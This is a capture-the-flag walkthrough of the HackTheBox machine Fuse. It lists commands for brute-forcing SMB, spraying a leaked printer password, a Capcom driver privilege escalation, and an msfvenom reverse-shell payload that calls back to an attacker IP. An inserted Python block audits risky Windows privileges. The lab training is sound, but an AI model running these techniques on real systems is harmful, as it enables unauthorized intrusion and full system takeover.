Today we are going to crack a machine called Fuse. It was created by egre55. This is a Capture the Flag type of challenge. This machine is hosted on HackTheBox. Let’s get cracking!
Penetration Testing Methodology
· Network Scanning
  o Nmap Scan
· Enumeration
  o Browsing HTTP Service
  o Crafting Dictionary for Bruteforce using CeWL
  o Bruteforcing SMB using Hydra
  o Connecting using RPCClient
  o Enumerating Printer Logs
· Exploitation
  o Password Spraying using Crackmapexec
  o Logging in using Evil-WinRM
  o Reading User Flag
· Privilege Escalation
  o Checking Privileges for the user
  o Exploiting SeLoadDriver Privilege using Capcom Exploit
  o Reading Root Flag
Walkthrough
Network Scanning
To attack any machine, we need its IP address. Machines hosted on HackTheBox have a static IP address.
IP Address assigned: 10.129.2.5
Now that we have the IP address, we need to enumerate the open ports on the machine. For this, we run an Nmap scan.
nmap -sC -sV 10.129.2.5
The Nmap version scan quickly gave us some great information. It reported that the following ports and services are running: 53 (DNS), 80 (HTTP), 139 (SMB) and other Windows Server services. It is now clear that this is a Windows-based machine; the OS detected is Microsoft Windows Server 2016.
Enumeration
We tried to access the HTTP service, but the redirect pointed to a hostname that did not resolve, so we need to add an entry for it in the /etc/hosts file.
After adding the entry, we are able to access the HTTP service. We find out that it is PaperCut Print Logger, free software that can log, audit and track printing on Windows systems and print servers. It is pretty common in corporate environments that want to keep track of a huge array of employees and printers.
Upon inspecting the different logs, we see that they have a user column. These users must also exist on the network, so we might need these usernames for a brute force.
To perform a brute force, we need to create a dictionary first. To craft the dictionary, we used CeWL.
cewl -w pwd.txt --with-numbers http://fuse.fabricorp.local/papercut/logs/html/index.htm
We decided to use Hydra as our brute-forcing tool. We got two successful hits, for the users tlavel and bhult. Both use the same password, Fabricorp01. First of all, that is not a secure or complex password, and two employees using the same password is unbelievable. What’s more shocking is that if this were a real corporate network, we would have gotten something like 50-60 users using default or weak passwords. Hence, no matter how good your infrastructure security is, if your employees are not following good password practices, you are bound to get attacked.
hydra -L users.txt -P pwd.txt 10.129.2.5 smb
We try to log in using smbclient, first as the user tlavel. It doesn’t log in but instead gives the error “NT_STATUS_PASSWORD_MUST_CHANGE”. This means we can’t log in with this password as it stands: the password must be changed before logging in. So, let’s change it. Changing the password over SMB requires the old password, after which we can set a new password of our choice.
smbclient -L 10.129.2.5 -U tlavel
smbpasswd -r 10.129.2.5 -U tlavel
Old SMB password: Fabricorp01
New SMB password: Password@123987
After spending enough time, we couldn’t find anything usable inside the SMB shares. This is where we decided to enumerate further using the RPC client, with the credentials we set earlier. There are a bunch of enumeration scripts and commands that we can run here, but since our initial assessment of the HTTP service showed that PaperCut Print Logger is installed on the machine, it makes sense to enumerate the printers on the network. We use enumprinters for this task.
rpcclient -U tlavel 10.129.2.5
enumprinters
The enumprinters output includes a logged password: $fab@s3Rv1ce$1
Since we know a password but not the username associated with it, we will perform password spraying. There are a bunch of tools that can be used for password spraying; we will be using CrackMapExec. After spraying, we learned that the user 'svc-print' has the password $fab@s3Rv1ce$1.
crackmapexec winrm 10.129.2.5 -u users.txt -p '$fab@s3Rv1ce$1'
Now, using the newly found credentials and Evil-WinRM, we try to log in. After some enumeration, we found the user flag.
evil-winrm -i 10.129.2.5 -u svc-print -p '$fab@s3Rv1ce$1'
Privilege Escalation
To elevate to a higher-level user, we enumerated the privileges of the current user. It showed that SeLoadDriverPrivilege is enabled for the current user. This is a very dangerous privilege: it allows the user to load kernel drivers and therefore execute code with kernel privileges. We will be using the Capcom driver exploit to elevate our privileges. To do this we first needed to download the Capcom.sys driver file, which will allow us to execute arbitrary code on the system. We also need to upload an executable that can load the driver file and drive the exploit.
whoami /priv
upload /root/Downloads/Capcom.sys .
upload /root/Downloads/ExploitCapcom.exe .
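As an added defensive counterpart (not part of the original walkthrough), this Python audit parses the [Privilege Rights] section of a `secedit /export` INF and flags any principal other than BUILTIN\Administrators holding SeLoadDriverPrivilege, the right abused here; it generalizes to SeDebugPrivilege, which is equally SYSTEM-equivalent. The INF excerpt and the svc-print entry are constructed. Print Operators hold SeLoadDriverPrivilege by default on domain controllers, which is why a print-service account is worth checking.

```python
# Constructed excerpt of a `secedit /export` INF (not taken from the page's machine).
# Principals are normally SIDs prefixed with '*'; unresolved names can appear bare.
SAMPLE_INF = """\
[Unicode]
Unicode=yes
[Privilege Rights]
SeLoadDriverPrivilege = *S-1-5-32-544,*S-1-5-32-550,svc-print
SeDebugPrivilege = *S-1-5-32-544
SeShutdownPrivilege = *S-1-5-32-544,*S-1-5-32-545
[Version]
signature="$CHICAGO$"
Revision=1
"""

WELL_KNOWN = {
    "S-1-5-32-544": "BUILTIN\\Administrators",
    "S-1-5-32-545": "BUILTIN\\Users",
    "S-1-5-32-550": "BUILTIN\\Print Operators",
}

# Rights that amount to kernel/SYSTEM access, and the only SID that should hold them.
RISKY = {
    "SeLoadDriverPrivilege": {"S-1-5-32-544"},
    "SeDebugPrivilege": {"S-1-5-32-544"},
}

def parse_privilege_rights(inf_text):
    """Return {privilege: [principal, ...]} from the [Privilege Rights] section only."""
    rights, in_section = {}, False
    for raw in inf_text.splitlines():
        line = raw.strip()
        if line.startswith("["):
            in_section = line == "[Privilege Rights]"
            continue
        if in_section and "=" in line:
            name, value = (p.strip() for p in line.split("=", 1))
            rights[name] = [p.strip().lstrip("*") for p in value.split(",") if p.strip()]
    return rights

def audit(inf_text, risky=RISKY):
    """List (privilege, principal) pairs where a non-allowlisted principal holds a risky right."""
    findings = []
    for priv, holders in parse_privilege_rights(inf_text).items():
        allowed = risky.get(priv)
        if allowed is None:
            continue  # not a right we care about (e.g. SeShutdownPrivilege)
        for sid in holders:
            if sid not in allowed:
                findings.append((priv, WELL_KNOWN.get(sid, sid)))
    return findings
```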
Now, let’s test the ability of the Capcom exploit to run commands as NT AUTHORITY\SYSTEM. To test, we first need to load the driver file using the executable. This checks for the SeLoadDriverPrivilege and then makes the appropriate entry in the registry. Then we can use the executable to run commands as NT AUTHORITY\SYSTEM.
.\ExploitCapcom.exe LOAD C:\Users\svc-print\Documents\Capcom.sys
.\ExploitCapcom.exe EXPLOIT whoami
To get an elevated shell, we craft a reverse_tcp payload using msfvenom.
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=10.10.14.52 LPORT=4444 -f exe > shell.exe
Now, we upload this crafted payload to the target system. Before executing it, we start Metasploit and create a handler for the shell, using the same LHOST and LPORT we specified in the payload. Then we execute the payload through the Capcom exploit. We see that it grabs a handle and executes the payload with elevated privileges.
upload /root/Downloads/shell.exe .
.\ExploitCapcom.exe EXPLOIT shell.exe
We went back to our Metasploit listener to see that it had captured the generated session.
use exploit/multi/handler
set payload windows/x64/meterpreter/reverse_tcp
set lhost 10.10.14.52
exploit
getsystem
All that’s left is to read the root flag.
ls
cd Administrator
cd Desktop
cat root.txt